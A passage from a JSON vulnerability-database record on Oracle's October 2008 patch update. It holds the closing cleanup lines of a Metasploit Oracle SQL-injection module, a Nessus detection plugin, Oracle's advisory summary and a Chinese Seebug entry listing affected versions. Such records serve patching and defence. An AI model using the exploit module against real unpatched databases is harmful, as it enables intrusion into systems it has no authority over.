prepare_exec(package2)\n rescue => e\n if ( e.to_s =~ /No Data/ )\n print_status(\"Removing function '#{cruft}'...\")\n prepare_exec(clean)\n else\n return\n end\n end\n\n end\nend\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/sqli/oracle/lt_compressworkspace.rb"}], "nessus": [{"lastseen": "2020-06-02T03:31:46", "description": "The remote Oracle database server is missing the October 2008\nCritical Patch Update (CPU) and therefore is potentially affected by\nsecurity issues in the following components :\n\n - Core RDBMS\n\n - Oracle Application Express\n\n - Oracle Data Capture\n\n - Oracle Data Mining\n\n - Oracle OLAP\n\n - Oracle Spatial\n\n - Upgrade\n\n - Workspace Manager", "edition": 18, "published": "2011-11-16T00:00:00", "title": "Oracle Database Multiple Vulnerabilities (October 2008 CPU)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3982", "CVE-2008-2625", "CVE-2008-3980", "CVE-2008-3983", "CVE-2008-4005", "CVE-2008-3992", "CVE-2008-3996", "CVE-2008-3990", "CVE-2008-3976", "CVE-2008-2624", "CVE-2008-3984", "CVE-2008-3991", "CVE-2008-3995", "CVE-2008-3989", "CVE-2008-3994"], "modified": "2011-11-16T00:00:00", "cpe": ["cpe:/a:oracle:database_server"], "id": "ORACLE_RDBMS_CPU_OCT_2008.NASL", "href": "https://www.tenable.com/plugins/nessus/56062", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56062);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/01\");\n\n script_cve_id(\n \"CVE-2008-2624\",\n \"CVE-2008-2625\",\n \"CVE-2008-3976\",\n \"CVE-2008-3980\",\n \"CVE-2008-3982\",\n \"CVE-2008-3983\",\n \"CVE-2008-3984\",\n \"CVE-2008-3989\",\n \"CVE-2008-3990\",\n \"CVE-2008-3991\",\n \"CVE-2008-3992\",\n \"CVE-2008-3994\",\n \"CVE-2008-3995\",\n \"CVE-2008-3996\",\n \"CVE-2008-4005\"\n );\n script_bugtraq_id(31683);\n\n script_name(english:\"Oracle Database Multiple Vulnerabilities (October 2008 CPU)\");\n script_summary(english:\"Checks installed patch info\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle database server is missing the October 2008\nCritical Patch Update (CPU) and therefore is potentially affected by\nsecurity issues in the following components :\n\n - Core RDBMS\n\n - Oracle Application Express\n\n - Oracle Data Capture\n\n - Oracle Data Mining\n\n - Oracle OLAP\n\n - Oracle Spatial\n\n - Upgrade\n\n - Workspace Manager\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9a813466\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2008 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:database_server\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_rdbms_query_patch_info.nbin\", \"oracle_rdbms_patch_info.nbin\");\n\n exit(0);\n}\n\ninclude(\"oracle_rdbms_cpu_func.inc\");\n\n################################################################################\n# OCT2008\npatches = make_nested_array();\n\n# RDBMS 11.1.0.6\npatches[\"11.1.0.6\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"11.1.0.6.4\", \"CPU\", \"7375639\");\npatches[\"11.1.0.6\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"11.1.0.6.7\", \"CPU\", \"7378392\");\npatches[\"11.1.0.6\"][\"db\"][\"win64\"] = make_array(\"patch_level\", \"11.1.0.6.7\", \"CPU\", \"7378393\");\n# RDBMS 10.1.0.5\npatches[\"10.1.0.5\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"10.1.0.5.12\", \"CPU\", \"7375686\");\npatches[\"10.1.0.5\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"10.1.0.5.28\", \"CPU\", \"7367493\");\n# RDBMS 10.2.0.4\npatches[\"10.2.0.4\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"10.2.0.4.0.2\", \"CPU\", \"7375644\");\npatches[\"10.2.0.4\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"10.2.0.4.9\", \"CPU\", \"7386320\");\npatches[\"10.2.0.4\"][\"db\"][\"win64\"] = make_array(\"patch_level\", \"10.2.0.4.9\", \"CPU\", \"7386321\");\n# RDBMS 10.2.0.3\npatches[\"10.2.0.3\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"10.2.0.3.8\", \"CPU\", \"7369190\");\npatches[\"10.2.0.3\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"10.2.0.3.27\", \"CPU\", \"7353782\");\npatches[\"10.2.0.3\"][\"db\"][\"win64\"] = make_array(\"patch_level\", \"10.2.0.3.27\", \"CPU\", \"7353785\");\n# RDBMS 10.2.0.2\npatches[\"10.2.0.2\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"10.2.0.2.11\", \"CPU\", \"7375660\");\n\ncheck_oracle_database(patches:patches);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "oracle": [{"lastseen": "2019-05-29T18:21:14", "bulletinFamily": "software", "cvelist": ["CVE-2008-2588", "CVE-2008-3982", "CVE-2008-4000", "CVE-2008-2625", "CVE-2008-3980", "CVE-2008-3975", "CVE-2008-3983", "CVE-2008-3257", "CVE-2008-3987", "CVE-2008-4005", "CVE-2008-4001", "CVE-2008-4009", "CVE-2008-4013", "CVE-2008-3992", "CVE-2008-4010", "CVE-2008-3985", "CVE-2008-3996", "CVE-2008-3993", "CVE-2008-3990", "CVE-2008-4008", "CVE-2008-4003", "CVE-2008-3988", "CVE-2008-3976", "CVE-2008-2619", "CVE-2008-2624", "CVE-2008-3984", "CVE-2008-3991", "CVE-2008-3995", "CVE-2008-4011", "CVE-2008-3998", "CVE-2008-4004", "CVE-2008-4012", "CVE-2008-4002", "CVE-2008-3989", "CVE-2008-3986", "CVE-2008-3977", "CVE-2008-3994"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. This Critical Patch Update contains 36 new security fixes across all products.\n", "modified": "2009-09-03T00:00:00", "published": "2008-10-14T00:00:00", "id": "ORACLE:CPUOCT2008-100299", "href": "", "type": "oracle", "title": "CPUOct2008 Advisory", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T21:23:34", "description": "BUGTRAQ ID: 31683\r\nCVE(CAN) ID: CVE-2008-4008,CVE-2008-4009,CVE-2008-4010,CVE-2008-4011,CVE-2008-4012,CVE-2008-4013,CVE-2008-4000,CVE-2008-4001,CVE-2008-4002,CVE-2008-4003,CVE-2008-4004,CVE-2008-3985,CVE-2008-3988,CVE-2008-3998,CVE-2008-3619,CVE-2008-3993,CVE-2008-3975,CVE-2008-3977,CVE-2008-3588,CVE-2008-3986,CVE-2008-3987,CVE-2008-3989,CVE-2008-2624,CVE-2008-3996,CVE-2008-3992,CVE-2008-3976,CVE-2008-3982,CVE-2008-3983,CVE-2008-3984,CVE-2008-3994,CVE-2008-3980,CVE-2008-4005,CVE-2008-2625,CVE-2008-3990,CVE-2008-3991\r\n\r\nOracle Database\u662f\u4e00\u6b3e\u5546\u4e1a\u6027\u8d28\u5927\u578b\u6570\u636e\u5e93\u7cfb\u7edf\u3002\r\n\r\nOracle\u53d1\u5e03\u4e862008\u5e747\u6708\u7684\u7d27\u6025\u8865\u4e01\u66f4\u65b0\u516c\u544a\uff0c\u4fee\u590d\u4e86\u591a\u4e2aOracle\u4ea7\u54c1\u4e2d\u7684\u591a\u4e2a\u6f0f\u6d1e\u3002\u8fd9\u4e9b\u6f0f\u6d1e\u5f71\u54cdOracle\u4ea7\u54c1\u7684\u6240\u6709\u5b89\u5168\u5c5e\u6027\uff0c\u53ef\u5bfc\u81f4\u672c\u5730\u548c\u8fdc\u7a0b\u7684\u5a01\u80c1\u3002\u5176\u4e2d\u4e00\u4e9b\u6f0f\u6d1e\u53ef\u80fd\u9700\u8981\u5404\u79cd\u7ea7\u522b\u7684\u6388\u6743\uff0c\u4f46\u4e5f\u6709\u4e9b\u4e0d\u9700\u8981\u4efb\u4f55\u6388\u6743\u3002\u6700\u4e25\u91cd\u7684\u6f0f\u6d1e\u53ef\u80fd\u5bfc\u81f4\u5b8c\u5168\u5165\u4fb5\u6570\u636e\u5e93\u7cfb\u7edf\u3002\u76ee\u524d\u5df2\u77e5\u7684\u6f0f\u6d1e\u5305\u62ec\uff1a\r\n\r\nBEA WebLogic Workshop\u4e2d\u6709\u5173NetUI\u6807\u7b7e\u7684\u6f0f\u6d1e\u53ef\u80fd\u5bfc\u81f4\u4fe1\u606f\u6cc4\u9732\u3002\r\n\r\nBEA WebLogic Server\u5728\u4f7f\u7528\u591a\u4e2a\u6388\u6743\u8005\uff08\u5982XACMLAuthorizer\u548cDefaultAuthorizer\uff09\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u7ed5\u8fc7\u67d0\u4e9b\u5b89\u5168\u9650\u5236\u3002\r\n\r\nApache\u7684WebLogic\u63d2\u4ef6\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u5b8c\u5168\u7684\u7cfb\u7edf\u5165\u4fb5\u3002\r\n\r\n\u5c06Bea WebLogic Server 8.1SP3\u5347\u7ea7\u5230\u66f4\u9ad8\u7248\u672c\u53ef\u80fd\u5bfc\u81f4\u65e0\u6548\u7528\u6237\u53ef\u4ee5\u4f7f\u7528\u4e4b\u524d\u53d7\u4fdd\u62a4\u7684\u5e94\u7528\u3002\u6210\u529f\u653b\u51fb\u8981\u6c42\u4f7f\u7528\u4e86CLIENT-CERT\u8ba4\u8bc1\u65b9\u5f0f\u3002\n\nOracle Application Server 9.0.4.3\r\nOracle Application Server 10.1.3.4.0\r\nOracle Application Server 10.1.3.0.0\r\nOracle Application Server 10.1.2.3.0 \r\nOracle Application Server 10.1.2.2.0\r\nOracle E-Business Suite 12.0.4\r\nOracle E-Business Suite 11.5.10.2\r\nOracle Database 9.2.0.8DV \r\nOracle Database 9.2.0.8\r\nOracle Database 11.1.0.6 \r\nOracle Database 10.2.0.4\r\nOracle Database 10.2.0.3\r\nOracle Database 10.2.0.2\r\nOracle Database 10.1.0.5\r\nOracle JD Edwards EnterpriseOne Tools 8.98\r\nOracle JD Edwards EnterpriseOne Tools 8.97\r\nOracle PeopleSoft Enterprise PeopleTools 8.49.14 \r\nOracle PeopleSoft Enterprise PeopleTools 8.48.18\r\nOracle WebLogic Server 9.2\r\nOracle WebLogic Server 9.1\r\nOracle WebLogic Server 9.0\r\nOracle WebLogic Server 8.1\r\nOracle WebLogic Server 7.0\r\nOracle WebLogic Server 6.1\r\nOracle WebLogic Server 10.0\r\nOracle PeopleSoft Enterprise Portal 9.0\r\nOracle PeopleSoft Enterprise Portal 8.9\r\nOracle Workshop for WebLogic 9.2\r\nOracle Workshop for WebLogic 9.1\r\nOracle Workshop for WebLogic 9.0\r\nOracle Workshop for WebLogic 8.1\r\nOracle Workshop for WebLogic 10.3 GA \r\nOracle Workshop for WebLogic 10.2 GA\r\nOracle Workshop for WebLogic 10.0\r\n\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOracle\r\n------\r\nOracle\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08cpuoct2008\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\ncpuoct2008\uff1aOracle Critical Patch Update Advisory - October 2008\r\n\u94fe\u63a5\uff1a<a href=http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html?_template=/o target=_blank>http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html?_template=/o</a>", "published": "2008-10-20T00:00:00", "type": "seebug", "title": "Oracle 2008\u5e7410\u6708\u7d27\u6025\u8865\u4e01\u66f4\u65b0\u4fee\u590d\u591a\u4e2a\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2624", "CVE-2008-2625", "CVE-2008-3588", "CVE-2008-3619", "CVE-2008-3975", "CVE-2008-3976", "CVE-2008-3977", "CVE-2008-3980", "CVE-2008-3982", "CVE-2008-3983", "CVE-2008-3984", "CVE-2008-3985", "CVE-2008-3986", "CVE-2008-3987", "CVE-2008-3988", "CVE-2008-3989", "CVE-2008-3990", "CVE-2008-3991", "CVE-2008-3992", "CVE-2008-3993", "CVE-2008-3994", "CVE-2008-3996", "CVE-2008-3998", "CVE-2008-4000", "CVE-2008-4001", "CVE-2008-4002", "CVE-2008-4003", "CVE-2008-4004", "CVE-2008-4005", "CVE-2008-4008", "CVE-2008-4009", "CVE-2008-4010", "CVE-2008-4011", "CVE-2008-4012", "CVE-2008-4013"], "modified": "2008-10-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4264", "id": "SSV:4264", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
